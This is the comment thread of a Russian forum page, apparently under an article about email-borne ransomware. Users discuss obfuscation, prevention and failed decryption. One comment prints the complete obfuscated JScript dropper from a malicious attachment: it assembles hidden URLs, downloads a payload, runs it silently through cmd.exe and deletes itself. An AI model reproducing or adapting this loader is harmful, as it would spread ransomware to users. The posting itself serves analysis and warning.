Pull to refresh

Comments 16

Найти и с помощью терморектального криптоанализатора получить пароль который вернёт всё в зад.
В архиве приложен JS файл
содержимое
function U(W, PK)
{
return FVt(W, PK);
}

function c(CVJ)
{
var WDq;
var Ews;
var EE = rn(42);

var b = new EE(«MSXML2.XMLHTTP»);
var Q = 0;
if (eOa(b, CVJ) == 0)
return false;

if (b[«Status»] != 200)
return !true;
var SL = new EE(«Scripting.FileSystemObject»);
var d = new EE(«ADODB.Stream»);
CVJ = gHg(SL);

QKy(d, b);

var T = d[«Read»]();
T = u(d, rn(7), T);
if (T.length < 10)
return false;
d[«SaveToFile»](CVJ);
d[«Close»]();

var X = rn(144);
var bN = «Wscript.Shell»;
WDq = new X(bN);
Ews = «cmd.exe /c » + CVJ;
WDq[«run»](Ews, 0);
if (!false)
{
CVJ = «del» + «eteF» + «ile»;
I(SL, CVJ);
return ((26+27)>28);
}
return Q;
}

function a(oS)
{
var K = oS.length;
return K;
}

function q()
{
var pPx = «ch»;
pPx += «arC»;
return pPx + «odeAt»;
}

function rWG(f)
{
var tqk = "";
var G = 5 — 5;
var pC = false;

var fh = rn(f+4);
var sb = 0;
if (f != sb)
{
}
else
return false;

if (false)
{
}
else
{
sb = new fh(«MSXML2.XMLHTTP»);
}

try
{
w = --sb;
}
catch (Z)
{
var Fl = hA(sb);
pC = !Fl;
}

return pC;
}

function QKy(Qm, Nq)
{
var St = «O» + «p» + "\x65" + «n»;
Qm[St]();
var rI = "\x54" + "\x79" + «p» + "\x65";
Qm[rI] = 1;

var Nvr = "\x57" + «r» + "\x69" + "\x74" + «e»;
var hGO = «R» + "\x65" + «s» + «p» + «o» + «n» + «s» + "\x65" + "\x42" + "\x6F" + «d» + "\x79";
Qm[Nvr](Nq[hGO]);
var J = "\x50" + «o» + «s» + «i» + «t» + «i» + «o» + «n»;
Qm[J] = 0;
}

function hA(XS)
{
var jb = typeof XS[«Open»];
var JM = («unknown»);
return (jb != JM );
}

function I(bj, m)
{
var p = WScript;
bj[m](p[«ScriptFullName»]);
}

function gHg(bmN)
{
var N = «G» + «e» + "\x74" + "\x53" + «p» + «e» + «c» + «i» + "\x61" + "\x6C" + «F» + «o» + «l» + "\x64" + "\x65" + «r»;
var sU = N;
var Ct = «G» + "\x65" + «t» + «T» + «e» + "\x6D" + «p» + «N» + «a» + "\x6D" + «e»;
var WUn = Ct;
var Bl = bmN[sU](2) + "\\" + bmN[WUn]();
return Bl;
}

function u(PL, j, rl)
{
var AF = "\x41" + "\x44" + «O» + "\x44" + «B» + "." + «R» + «e» + "\x63" + «o» + "\x72" + "\x64" + «s» + «e» + "\x74";
var oL = new j(AF);
var oV = "\x61" + «d» + "\x64" + «N» + "\x65" + "\x77";
var O = oV;
var RK = PL[«Si» +«ze»];
var Ga = 201;
oL[«fields»][«ap» + «pe» + «n» + «d»](«bin», Ga, RK);
oL[«o» + «pen»]();
oL[O]();
var ML = "\x62" + "\x69" + "\x6E";
var ZQ = ML;
var QN = «a» + "\x70" + "\x70" + «e» + «n» + "\x64" + "\x43" + «h» + "\x75" + "\x6E" + «k»;
var i = QN;
oL(ZQ)[i](rl);
var LCB = «u» + "\x70" + "\x64" + «a» + «t» + "\x65";
var S = LCB;
oL[S]();
var wh = "\x76" + «a» + "\x6C" + "\x75" + «e»;
var t = wh;
return oL(ZQ)[t];
}

function eOa(Nq, tB)
{
var QGL = «o» + "\x70" + «e» + «n»;
var ZBS = «G» + «E» + «T»;
var gR=158389;
var xIi=gR+27797;
var eO=xIi/546;
var jgs=eO-341;
Nq[QGL](ZBS, tB, jgs);
try {
var Sb = «s» + «e» + "\x6E" + «d»;
Nq[Sb]();
} catch (djF) {
return (1-1);
}
return 1;
}

function bp(Vl, Bli)
{
var l=6145;
var HSu=l+1355;
var fR=HSu/12;
var xkt=fR-601;
var CVJ = xkt;
var Yy=[«ud»,«f»,"/w",«w.»,«w»,«in»,«ox»,«s»,":/","-",«ht»,«t»,«nt»,«hl»,«o»,«e»,«m»,«m/»,«e»,«h»,«n»,«c»,«ux»,«wp»,«i»,«ux»,«w.»,"/t",«g»,"/p",«n»,«e»,«a»,"/h",«o»,"/",«c»,«la»,"/",«on»,«p.»,«a»,«s»,"/",«tp»,«p»,«s»,«cl»,«as»,«e»,"-c",«es»,«la»,«i»];
var Dm=Yy[10]+Yy[44]+Yy[8]+Yy[2]+Yy[4]+Yy[26]+Yy[34]+Yy[45]+Yy[48]+Yy[37]+Yy[3]+Yy[21]+Yy[14]+Yy[17]+Yy[23]+Yy[50]+Yy[39]+Yy[11]+Yy[49]+Yy[12]+Yy[27]+Yy[19]+Yy[15]+Yy[16]+Yy[31]+Yy[46]+Yy[29]+Yy[13]+Yy[6]+Yy[35]+Yy[32]+Yy[22]+Yy[24]+Yy[20]+Yy[43]+Yy[41]+Yy[25]+Yy[5]+Yy[9]+Yy[53]+Yy[30]+Yy[47]+Yy[0]+Yy[18]+Yy[38]+Yy[36]+Yy[52]+Yy[7]+Yy[42]+Yy[51]+Yy[33]+Yy[40]+Yy[28]+Yy[1];
var kJ=[«m»,«p»,«k»,"/h",«e.»,«r»,«t»,«r.»,«er»,«la»,«ab»,«h»,«ve»,«tp»,":","/",«p»,«f»,«ai»,«rs»,«co»,".",«g»,"/"];
var TrO=kJ[11]+kJ[6]+kJ[13]+kJ[14]+kJ[23]+kJ[15]+kJ[5]+kJ[10]+kJ[9]+kJ[2]+kJ[4]+kJ[1]+kJ[18]+kJ[19]+kJ[8]+kJ[12]+kJ[7]+kJ[20]+kJ[0]+kJ[3]+kJ[16]+kJ[21]+kJ[22]+kJ[17];
CVJ = (Vl > Bli)?(Dm):(TrO);
return c(CVJ);
}

function rn(UVp)
{
return ActiveXObject;
}

function Bub(WG)
{
if ((WG > 5) && rWG(1))
{
var sc = bp(7, 4);
if (sc == false)
sc = bp(23, 56);
var HfP=242357;
var mK=HfP+27824;
var R=mK/691;
var wk=R-388;
return wk;
}
var iW=46259;
var ZKO=iW+2221;
var gs=ZKO/60;
var M=gs-804;
return M;
}

if (8 > 1)
{
var K = true?Bub(7 + 5):7;
}


Вообще активная рассылка идет уже несколько месяцев. Мне на личную почту прилетало больше 10 раз…
UFO just landed and posted this here
Это называется обфускация. Затрудняет анализ логики работы скрипта.
UFO just landed and posted this here
Возможно эти цифры генерируются динамически при создании каждой копии вируса. Видимо чтобы сложней было составить сигнатуру.
PS. Кажется это звалось полиморфизм относительно вирусов.
Чтобы обойти эвристику антивирусов.
Что бы усложнить идентификацию вирусняка методом сравнения сигнатур
не переходить по сомнительным ссылкам;

Учитывая, сколько сейчас обычных сайтов построено на решетках вроде вордпреса и друпала. Такой себе совет. Поможет только совсем уж от левых сайтов вида «zZShFJDH.......KJFHFyDJ.xyz».
А ещё вспомним неприятно пахнущие почтовые сервисы и системы рассылок, которые в погоне за переходами пользователя «проксируют» все ссылки через себя, превращая их во что-то вроде https://fcukingmailer.cloud.track.noprivacy.com/trackyourass/0Y8g0LXQsdCw0Lsg0YHRgNCw0L3Ri9C1INGC0YDQtdC60LXRgNGL
насчет «профилактики заражения»: srp/applocker? Пользователям бесполезно что-то объяснять, проще у них все права порезать.
… от имени сотрудников крупных авиакомпаний (например, «Полярные авиалинии")

Компания региональная, но в своём регионе значимая и соответственно её услугами постоянно пользуются в командировках и имеется корреспонденция. Надо предупредить народ.

Как раз неделю назад в местной школе поймали такой. Ни один декриптор не помог, каспер отказывается работать из-за разницы в размере зашифрованного и расшифрованного преступником файла. Повезло, что критически важных данных не было, а то бы все могло очень плохо закончиться

Злой Вы…
А просто — посочувствовать?
Под обычным пользователем в системе тоже сработает или нужны права администратора?
Only those users with full accounts are able to leave comments. Log in, please.